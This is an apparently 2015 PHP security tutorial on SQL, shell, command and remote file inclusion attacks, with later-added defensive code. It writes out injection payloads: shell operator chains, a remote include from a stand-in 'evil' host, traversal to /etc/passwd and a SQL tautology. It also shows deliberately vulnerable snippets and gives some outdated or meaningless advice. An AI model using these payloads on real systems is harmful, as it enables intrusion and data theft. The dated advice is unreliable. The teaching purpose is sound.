Friday, May 1, 2015

PHP Security: SQL and Remote Code Injection

SQL injection

SQL injection is a technique for injecting code into a data-driven application: malicious SQL statements are entered into an input field so that the application executes them. It exploits weaknesses in the application software and is mostly used to attack the application layer. Once it succeeds, the attacker has a direct channel to the database.

Suppose we are filling in a form and one of the input fields is not properly validated. If an attacker injects a malicious SQL command that returns extra information from the database, that field becomes a direct channel to the database.

Shell Injection

Shell injection is an attack against a PHP script that builds a command line from user input and executes it. Consider the following short PHP program, which runs an external program called funnytext to replace a word the user sent with some other word:

<?php
 // the request parameter is concatenated straight into the command line, unescaped
 passthru("/home/user/php/funnytext " . $_GET['USER_INPUT']);
?>

This program can be injected in multiple ways:

`command` will execute command.
$(command) will execute command.
; command will execute command after funnytext, and output the result of command.
| command will execute command with the output of funnytext as its input.
&& command will execute command if funnytext succeeds, and output the result of command.
|| command will execute command if funnytext fails, and output the result of command.
> /home/user/php/.bashrc will overwrite the file .bashrc.
< /home/user/php/.bashrc will send the file .bashrc as input to funnytext.

PHP offers escapeshellarg() and escapeshellcmd() to escape such input before it is passed to a shell-executing function such as passthru().

Ways to prevent code injection attacks

The ways to prevent code injection attacks are as follows:
Perform input validation.
Escape dangerous characters. For instance, in PHP, use the htmlentities() function to protect general inputs to the web application, and mysql_real_escape_string() to protect inputs that will be included in an SQL request, which guards against SQL injection.
Perform input encoding.
Perform output encoding.
Perform modular shell disassociation from the kernel.

Remote File Inclusion

Remote File Inclusion is a vulnerability most often found on web sites. It permits an attacker to include a remote file on the web server in the form of a script. The vulnerability arises because data supplied by the user is used without proper validation. This can cause the following:
Execution of code on client-system via JavaScript that can lead to attacks such as cross-site scripting.
Execution of code on the web server.
Denial of Service (DoS)
Data Theft or Manipulation

In PHP, it is easily caused by the habitual use of external variables such as $_POST, $_GET and $_COOKIE with a file system function, most often in include and require statements. The vulnerabilities are mainly introduced by new developers who are not yet familiar with the capabilities of the PHP language. PHP has a directive, allow_url_fopen, which, when enabled, allows file system functions to take a URL and fetch data from remote locations. An attacker can alter a variable that is passed to one of these functions and thereby cause the inclusion of malicious code from a remote resource. Therefore, every user input should be validated before it is used.

Example

Consider the following code:

<?php
 $color = 'blue';
 if (isset( $_GET['COLOR'] ) )
  $color = $_GET['COLOR'];     // unvalidated request value
 require( $color . '.php' );   // used directly as a file name
?>

For the PHP script given above, the following HTML code needs to be submitted:

<form method="get">
 <select name="COLOR">
  <option value="red">red</option>
  <option value="blue">blue</option>
 </select>
 <input type="submit">
</form>

The developer wrote the code with the intention that only blue.php and red.php should be used as options. However, any arbitrary value can easily be inserted in COLOR, so it is possible to inject code from files:
/vulnerable.php?COLOR=http://evil/exploit? - Injects a remotely hosted file that contains an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file with the name exploit.php.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd - Lets an attacker read the contents of the passwd file on a UNIX system through directory traversal.
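The COLOR include can be hardened in two independent ways, shown here as an added example that is not code from the original post: an allow-list that maps the request value to a developer-chosen file name, and a realpath() check that the resolved file stays inside one directory. The pages directory and the file names are assumptions; the payloads are the ones listed above.

```php
<?php
// Added example (not from the original post): hardening the COLOR include.
// PAGE_DIR is an assumed location for red.php and blue.php.

declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['red' => 'red.php', 'blue' => 'blue.php'];

// Preferred defence: map the request value to a file name chosen by the developer.
// Anything not in the map is rejected, so URLs, drive letters and ../ never reach require().
function pageFromAllowList(string $color): ?string
{
    return ALLOWED_PAGES[$color] ?? null;
}

// Defence in depth: confirm that the resolved path is a real file directly under
// PAGE_DIR. realpath() collapses ../ sequences and returns false for anything that
// does not exist on the local filesystem, such as a remote URL.
function pageInsideDir(string $color, string $baseDir = PAGE_DIR): ?string
{
    if ($color === '' || strlen($color) > 32 || !ctype_alnum($color)) {
        return null;                       // reject NUL bytes, slashes, colons, etc. early
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $color . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Compare with the separator appended so that "/pages-evil" cannot match "/pages".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: the developer's two values plus the payloads discussed above.
$inputs = ['blue', 'red', 'http://evil/exploit?', 'C:\\ftp\\upload\\exploit',
           '../../../../../../../../etc/passwd', "C:\\notes.txt\0"];
foreach ($inputs as $in) {
    $ok = pageFromAllowList($in) !== null && pageInsideDir($in) !== null;
    printf("%-40s %s\n", addcslashes($in, "\0"), $ok ? 'include' : 'reject');
}
// Only 'blue' and 'red' pass, and only when pages/blue.php and pages/red.php exist;
// a passing value would then be used as require(pageInsideDir($in)).
```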

Command injection attack

A command injection attack injects and executes commands chosen by the attacker in a vulnerable application. An application that executes unwanted system commands acts like a virtual system shell, which the attacker can use as if it were any authorized system user. The commands, however, run with the same privileges and environment as the application. Command injection attacks are possible in most cases because of a lack of correct validation of input data, which the attacker can therefore manipulate.

Include file injection attack

In an include file injection attack, a malicious user injects a remotely hosted file containing an exploit. The PHP program in the example above, which requires a file named by the COLOR request parameter, is exactly this case: the developer thought it would ensure that only blue.php and red.php could be loaded, but because anyone can insert arbitrary values in COLOR, the remote URL, uploaded-file and directory-traversal payloads listed above all apply, and so does one more:
/vulnerable.php?COLOR=C:\\notes.txt - Uses a NULL meta character to remove the .php suffix, allowing access to files other than .php. (The PHP setting "magic_quotes_gpc = On" would stop this attack.)

escapeshellcmd() function

The escapeshellcmd() function escapes all shell metacharacters and control operators in a string by prefixing them with backslashes. This reduces the risk of passing user input to the shell, and so it is used to counter command injection attacks.

escapeshellarg() function

The escapeshellarg() function converts a scalar value into a single-quote-delimited string that can safely be used as a single argument to a shell command. It replaces each existing single quote (') with '\''; this sequence temporarily ends the single-quoted string, inserts a literal single quote, and then resumes the string. Because data passed through escapeshellarg() can safely be used as a single argument, the function mitigates command injection attacks.
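The funnytext command line from the shell injection section, built three ways, as an added example that is not code from the original post: the vulnerable concatenation, the same line with escapeshellarg() applied as described above, and an allow-list check that rejects the value before it reaches a shell. Only the path /home/user/php/funnytext comes from the post; the inputs are constructed and the output shown is for PHP on Linux.

```php
<?php
// Added example (not from the original post): the funnytext command line built
// three ways. Only the path /home/user/php/funnytext is the post's; the inputs
// are constructed. escapeshellarg() output shown is for PHP on Linux.

declare(strict_types=1);

const FUNNYTEXT = '/home/user/php/funnytext';

// 1. The post's vulnerable construction: raw input concatenated into the command.
function unsafeCommand(string $word): string
{
    return FUNNYTEXT . ' ' . $word;
}

// 2. escapeshellarg() wraps the value in single quotes and turns each embedded
//    single quote into '\'' so the whole value reaches funnytext as one argument.
function quotedCommand(string $word): string
{
    return FUNNYTEXT . ' ' . escapeshellarg($word);
}

// 3. Validate first: funnytext expects a word, so accept only letters of a sane
//    length and reject everything else before it goes anywhere near a shell.
function validatedCommand(string $word): ?string
{
    if ($word === '' || strlen($word) > 64 || !ctype_alpha($word)) {
        return null;
    }
    return FUNNYTEXT . ' ' . escapeshellarg($word);
}

$chain = 'hello; id';   // constructed: uses the ; operator from the list above
$quote = "it's";        // constructed: carries the quote escapeshellarg() must handle

echo unsafeCommand($chain), "\n";      // /home/user/php/funnytext hello; id  (shell also runs id)
echo quotedCommand($chain), "\n";      // /home/user/php/funnytext 'hello; id'  (one literal argument)
echo quotedCommand($quote), "\n";      // /home/user/php/funnytext 'it'\''s'
var_dump(validatedCommand($chain));    // NULL: rejected by the allow-list
var_dump(validatedCommand('hello'));   // string(32) "/home/user/php/funnytext 'hello'"

// Caveat: escapeshellcmd() escapes metacharacters but leaves spaces alone, so a value
// such as "--verbose hello" still reaches funnytext as two arguments. Quote each argument
// with escapeshellarg(); do not rely on escapeshellcmd() over a whole command line.
```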

mysqli_real_escape_string

The mysqli_real_escape_string() function escapes the special characters in a string for use in an SQL statement, taking into account the current character set of the connection.
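The SQL injection described at the start of the post, and its fix, as an added example that is not code from the original post. It uses PDO with an in-memory SQLite database so that it runs offline; mysqli_real_escape_string() itself needs a live MySQL connection because it escapes according to the connection's character set, so PDO::quote() stands in for it here, and a prepared statement is shown as the stronger alternative. The table, rows and inputs are constructed.

```php
<?php
// Added example (not from the original post): one lookup built by string
// concatenation, by escaping, and as a prepared statement. PDO + SQLite is
// used so the script runs offline; the table and rows are constructed.

declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (name TEXT, secret TEXT)');
    $db->exec("INSERT INTO users VALUES ('alice', 's1'), ('bob', 's2')");
    return $db;
}

// Vulnerable: the input becomes part of the SQL text, so a quote changes the query.
function findUnsafe(PDO $db, string $name): array
{
    $sql = "SELECT name FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Escaped: PDO::quote() plays the role of mysqli_real_escape_string(), doubling the
// embedded quotes so the value stays inside the string literal. Only valid for values
// that sit inside quotes; it does nothing for numbers or identifiers.
function findEscaped(PDO $db, string $name): array
{
    $sql = 'SELECT name FROM users WHERE name = ' . $db->quote($name);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the SQL text is fixed before any data arrives; the value is bound separately.
function findPrepared(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT name FROM users WHERE name = ?');
    $stmt->execute([$name]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = makeDb();
$hostile = "x' OR '1'='1";   // constructed: turns the WHERE clause into a tautology

print_r(findUnsafe($db, 'alice'));      // only alice
print_r(findUnsafe($db, $hostile));     // alice and bob: the quote broke out of the literal
print_r(findEscaped($db, $hostile));    // empty: the whole value stayed inside the literal
print_r(findPrepared($db, $hostile));   // empty: no user is literally named x' OR '1'='1
```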
